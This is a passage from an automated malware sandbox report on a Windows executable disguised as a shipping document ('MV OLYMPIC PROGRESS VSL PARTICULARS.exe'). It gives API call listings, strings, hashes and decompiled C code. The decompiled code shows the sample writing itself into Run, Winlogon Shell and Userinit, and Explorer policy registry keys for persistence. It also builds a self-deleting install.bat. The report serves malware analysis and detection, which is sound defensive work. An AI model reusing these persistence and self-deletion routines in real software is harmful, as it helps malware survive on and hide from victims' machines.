                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068ED
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068FF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406908
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406911
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406923
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406931
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040693C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 0040694F
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 0040695C
                                          • exit.KERNELBASE ref: 00406968
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00406974
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$V10@$V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$??0?$basic_string@$??6std@@D@1@@D@std@@@0@V?$basic_ostream@$??4?$basic_string@V01@V01@@$File$V10@0@$AttributesCopyD@2@@0@@D@std@@@std@@$?close@?$basic_ofstream@CreateD?$basic_ofstream@DirectoryExecuteShellexitgetenv
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$Ox@$PING 127.0.0.1 -n 2 $Temp$\install.bat$del $del %0 $exit $open$start ""
                                          • API String ID: 979383944-3309268095
                                          • Opcode ID: bac842e0c79e4d9742225db187f362191824e91e391a86a9638ddca735f1309d
                                          • Instruction ID: 3a0a7e291378ef6016657a3b256388cc9313874f64008c8d2928daba6d98e237
                                          • Opcode Fuzzy Hash: bac842e0c79e4d9742225db187f362191824e91e391a86a9638ddca735f1309d
                                          • Instruction Fuzzy Hash: C8D1507190011EEBCB10ABA0EC5DDEE7B7CFB54304B044476F516E2191EEB89A99CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407177
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004071AE
                                          • getenv.MSVCRT ref: 004071BE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071C9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004071D4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004071E0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071E9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071F2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071FB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 0040720F
                                          • getenv.MSVCRT ref: 0040721F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040722A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407235
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407241
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407253
                                          • getenv.MSVCRT ref: 00407271
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 0040727C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104,00000000), ref: 00407292
                                          • GetLongPathNameA.KERNELBASE(00000000), ref: 00407299
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004072AB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,00000000), ref: 004072BE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004072D4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072DF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072EB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407308
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407311
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040731A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$??4?$basic_string@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@getenv$?c_str@?$basic_string@LongNamePath
                                          • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 3803880367-1609423294
                                          • Opcode ID: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                                          • Instruction ID: 2eda70330f8664ebbc080e427488994969dc3d13a538355b743bf2b4edd7a6ea
                                          • Opcode Fuzzy Hash: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                                          • Instruction Fuzzy Hash: 68518D7290410EEBCB14DBA0EE5EDEE7778EF54305B204176F506A2090DEB86F89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00406339(void* __ecx, char _a4, char _a7, char _a8, char _a12, char _a16, char _a20, intOrPtr _a24) {
                                          				char _v20;
                                          				char _v36;
                                          				char _v52;
                                          				void* _t29;
                                          				void* _t31;
                                          				char* _t32;
                                          				char* _t35;
                                          				char* _t58;
                                          				void* _t59;
                                          				void* _t64;
                                          				void* _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          
                                          				_t58 = "\"";
                                          				if(_a4 == 1) {
                                          					_t75 = _t59 - 0x10;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a24, _t75,  &_v20,  &_v20, _t58, 0x4157d0); // executed
                                          					_t59 = _t75 + 0x38;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          				}
                                          				if(_a8 == 1) {
                                          					_t72 = _t59 - 0x10;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a24, _t72,  &_v20,  &_v20, _t58, 0x4157d0);
                                          					_t59 = _t72 + 0x38;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          				}
                                          				if(_a12 == 1) {
                                          					_t35 =  &_a7;
                                          					_t68 = _t59 - 0x10;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("explorer.exe, ", _t35, _t58, 0x4157d0, _t58, 1);
                                          					L0040FC20();
                                          					L0040FC14();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "Shell", _t68,  &_v20,  &_v20,  &_v36,  &_v36);
                                          					_t59 = _t68 + 0x44;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t35);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				if(_a16 == 1) {
                                          					_t32 =  &_a7;
                                          					_t64 = _t59 - 0x10;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("C:\\WINDOWS\\system32\\userinit.exe, ", _t32, _t58, 0x4157d0, _t58, 1);
                                          					L0040FC20();
                                          					L0040FC14();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "Userinit", _t64,  &_v52,  &_v52,  &_v36,  &_v36);
                                          					_t59 = _t64 + 0x44;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t32);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				if(_a20 == 1) {
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t31 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a24, _t59 - 0x10,  &_v52,  &_v52, _t58, 0x4157d0);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          					return _t31;
                                          				}
                                          				return _t29;
                                          			}
















                                          0x00406346
                                          0x00406350
                                          0x00406357
                                          0x00406360
                                          0x0040636a
                                          0x0040637f
                                          0x00406384
                                          0x0040638a
                                          0x0040638a
                                          0x00406394
                                          0x0040639b
                                          0x004063a4
                                          0x004063ae
                                          0x004063c3
                                          0x004063c8
                                          0x004063ce
                                          0x004063ce
                                          0x004063d8
                                          0x004063dc
                                          0x004063df
                                          0x004063f0
                                          0x004063fb
                                          0x00406408
                                          0x00406412
                                          0x00406429
                                          0x0040642e
                                          0x00406434
                                          0x0040643d
                                          0x00406446
                                          0x00406446
                                          0x00406450
                                          0x00406454
                                          0x00406457
                                          0x00406468
                                          0x00406473
                                          0x00406480
                                          0x0040648a
                                          0x004064a1
                                          0x004064a6
                                          0x004064ac
                                          0x004064b5
                                          0x004064be
                                          0x004064be
                                          0x004064c8
                                          0x004064d8
                                          0x004064e2
                                          0x004064f7
                                          0x00406502
                                          0x00000000
                                          0x00406502
                                          0x0040650c

                                          APIs
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,Ox@), ref: 00406360
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 0040638A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004064D8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004064E2
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 0040636A
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,Ox@), ref: 004063A4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063CE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe, ,?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004063F0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Ox@), ref: 004063FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 00406408
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406412
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406434
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040643D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406446
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 00406468
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406473
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406480
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040648A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064AC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064B5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064BE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 00406502
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@D@1@@V10@0@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$C:\WINDOWS\system32\userinit.exe, $Ox@$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                                          • API String ID: 3158786748-3738466437
                                          • Opcode ID: 30b6fbe25face7c64cbd925131015d48c9dfd3434ba07a9143d2737ca0a7f8a4
                                          • Instruction ID: 3f221fffa98c3c74c31811f4ef3579c22c6f931b89917dd235009d3eae723281
                                          • Opcode Fuzzy Hash: 30b6fbe25face7c64cbd925131015d48c9dfd3434ba07a9143d2737ca0a7f8a4
                                          • Instruction Fuzzy Hash: A0417871D00219BBEB10BBA1DD4FEEF7F2DEB51314F00043AF90571182EAB95998C6A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,73115DF0), ref: 0040F05A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F064
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F06D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                          • String ID:
                                          • API String ID: 3435050692-0
                                          • Opcode ID: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                                          • Instruction ID: 05261c11a0c2935763cb9f53f66ce9cc739fdea45f744e86f2ec5e7b64bf2302
                                          • Opcode Fuzzy Hash: b0a590d7568685fd502d2526f30560aa99c2d8ff11d0c264287033065e04a1e4
                                          • Instruction Fuzzy Hash: 6F31997150014AABCB14EFA1ED9DCDE7B79EE54305B108079F406A31A0EF75AF4ACB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				CHAR* _v8;
                                          				intOrPtr* _v24;
                                          				intOrPtr _v28;
                                          				struct _STARTUPINFOA _v96;
                                          				int _v100;
                                          				char** _v104;
                                          				int _v108;
                                          				void _v112;
                                          				char** _v116;
                                          				intOrPtr* _v120;
                                          				intOrPtr _v124;
                                          				intOrPtr* _t23;
                                          				intOrPtr* _t24;
                                          				void* _t27;
                                          				void _t29;
                                          				intOrPtr _t36;
                                          				signed int _t38;
                                          				int _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr _t42;
                                          				intOrPtr _t46;
                                          				intOrPtr _t47;
                                          				intOrPtr _t49;
                                          				void* _t52;
                                          				intOrPtr* _t55;
                                          				intOrPtr _t58;
                                          				intOrPtr _t61;
                                          
                                          				_t52 = __edx;
                                          				_push(0xffffffff);
                                          				_push(0x411918);
                                          				_push(0x40fc60);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t58;
                                          				_v28 = _t58 - 0x68;
                                          				_v8 = 0;
                                          				__set_app_type(2);
                                          				 *0x415c1c =  *0x415c1c | 0xffffffff;
                                          				 *0x415c20 =  *0x415c20 | 0xffffffff;
                                          				_t23 = __p__fmode();
                                          				_t46 =  *0x415c14; // 0x0
                                          				 *_t23 = _t46;
                                          				_t24 = __p__commode();
                                          				_t47 =  *0x415c10; // 0x0
                                          				 *_t24 = _t47;
                                          				 *0x415c18 = _adjust_fdiv;
                                          				_t27 = E0040FF13( *_adjust_fdiv);
                                          				_t61 =  *0x415150; // 0x1
                                          				if(_t61 == 0) {
                                          					__setusermatherr(E0040FF10);
                                          					_pop(_t47);
                                          				}
                                          				E0040FEFE(_t27);
                                          				_push(0x4150a8);
                                          				_push(0x4150a4);
                                          				L0040FEF8();
                                          				_t29 =  *0x415c0c; // 0x0
                                          				_v112 = _t29;
                                          				__getmainargs( &_v100,  &_v116,  &_v104,  *0x415c08,  &_v112);
                                          				_push(0x4150a0);
                                          				_push(0x415000); // executed
                                          				L0040FEF8(); // executed
                                          				_t55 =  *_acmdln;
                                          				_v120 = _t55;
                                          				if( *_t55 != 0x22) {
                                          					while(1) {
                                          						__eflags =  *_t55 - 0x20;
                                          						if(__eflags <= 0) {
                                          							goto L7;
                                          						}
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          					}
                                          				} else {
                                          					do {
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          						_t42 =  *_t55;
                                          					} while (_t42 != 0 && _t42 != 0x22);
                                          					if( *_t55 == 0x22) {
                                          						L6:
                                          						_t55 = _t55 + 1;
                                          						_v120 = _t55;
                                          					}
                                          				}
                                          				L7:
                                          				_t36 =  *_t55;
                                          				if(_t36 != 0 && _t36 <= 0x20) {
                                          					goto L6;
                                          				}
                                          				_v96.dwFlags = 0;
                                          				GetStartupInfoA( &_v96);
                                          				_t69 = _v96.dwFlags & 0x00000001;
                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                          					_t38 = 0xa;
                                          				} else {
                                          					_t38 = _v96.wShowWindow & 0x0000ffff;
                                          				}
                                          				_t40 = E00407452(_t47, _t52, _t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
                                          				_v108 = _t40;
                                          				exit(_t40);
                                          				_t41 = _v24;
                                          				_t49 =  *((intOrPtr*)( *_t41));
                                          				_v124 = _t49;
                                          				_push(_t41);
                                          				_push(_t49);
                                          				L0040FEF2();
                                          				return _t41;
                                          			}






























                                          0x0040fd88
                                          0x0040fd8b
                                          0x0040fd8d
                                          0x0040fd92
                                          0x0040fd9d
                                          0x0040fd9e
                                          0x0040fdab
                                          0x0040fdb0
                                          0x0040fdb5
                                          0x0040fdbc
